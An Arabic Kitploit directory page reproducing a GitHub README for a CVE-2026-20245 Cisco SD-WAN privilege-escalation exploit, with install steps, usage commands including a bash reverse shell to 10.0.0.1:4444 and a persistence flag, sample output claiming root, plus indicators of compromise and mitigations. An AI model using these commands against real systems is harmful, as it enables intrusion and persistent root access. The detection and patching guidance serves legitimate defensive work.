Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit — **هذا الكود هو لأغراض تعليمية واختبارات أمنية مرخصة فقط.** | Kitploit
أدوات/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الشبكاتاختبار الاختراقالقيادة والسيطرةالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**هذا الكود هو لأغراض تعليمية واختبارات أمنية مرخصة فقط.**

عرض المستودع
3منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-20245 - استغلال تصعيد الصلاحيات في Cisco SD-WAN

Security Rating CVSS CISA KEV

⚠️ تحذير

هذا الكود مخصص فقط للأغراض التعليمية واختبارات الأمن المصرح بها.

📋 الوصف

CVE-2026-20245 هي ثغرة تصعيد صلاحيات في CLI لـ Cisco Catalyst SD-WAN Controller (vSmart)، Cisco Catalyst SD-WAN Manager (vManage)، و Cisco Catalyst SD-WAN Validator (vBond). يمكن لمهاجم موثّق بصلاحيات netadmin تنفيذ أوامر عشوائية كجذر (root) عن طريق تحميل ملف مصمم خصيصًا.

التفاصيل التقنية

الحقلالقيمة
CVECVE-2026-20245
CVSS7.8 (High)
VectorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
المكونCLI / CSV Upload
النوعCommand Injection (CWE-116)

🎯 الإصدارات المتأثرة

المنتجالإصدارات المعرضة للخطر
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

الإصدارات المحددة المعرضة للخطر:

  • 20.9.x (تلك)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 التثبيت

root@kitploit:~
# Clonar repositorio
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# Instalar dependencias
pip install -r requirements.txt

# Dar permisos
chmod +x exploit.py

📦 التبعيات txt requests>=2.31.0

🚀 الاستخدام

التحقق من الإصدار

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only

تنفيذ أمر

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"

Shell عكسي

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

تثبيت الثبات

root@kitploit:~
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist

🔍 المخرجات المتوقعة

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================

🔍 مؤشرات الاختراق (IOCs)

التحقق في السجلات (/var/log/scripts.log)

root@kitploit:~
# Buscar actividad sospechosa
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# Comandos específicos a buscar
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv

الملفات المشبوهة

  • /home/admin/*.csv (ملفات CSV غير مصرح بها)
  • /tmp/*.csv
  • /var/log/scripts.log مع إدخالات غير عادية

العمليات

root@kitploit:~
# Buscar procesos root inusuales
ps aux | grep -E "bash|sh|nc|ncat|socat"

🛡️ التخفيف

الخيار 1 - التحديث إلى الإصدار الثابت (موصى به)

الإصدارالإصدار الثابت
20.18.2.1 والإصدارات الأقدم20.18.3.1

الخيار 2 - تقييد الوصول

  • تقييد الوصول الإداري إلى شبكة الإدارة
  • استخدام المصادقة متعددة العوامل
  • مراقبة نشاط تحميل CSV

الخيار 3 - التكوين الآمن

root@kitploit:~
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers

# Limitar privilegios netadmin
admin privilege restrict

📚 المراجع

  • Cisco Security Advisory
  • NVD - CVE-2026-20245
  • CISA KEV Catalog

📊 الجدول الزمني

التاريخالحدث
2026-05-14Cisco تنشر إعلانًا أوليًا
2026-06-04نشر CVE رسميًا
2026-06-09CISA تضيفه إلى KEV
2026-06-23الموعد النهائي من CISA للتحديث

⚖️ إخلاء المسؤولية

يتم توفير هذا البرنامج "كما هو"، دون أي ضمانات. المؤلف ليس مسؤولاً عن أي استخدام غير مصرح به. استخدمه فقط على الأنظمة المصرح بها.

تنزيل الأداة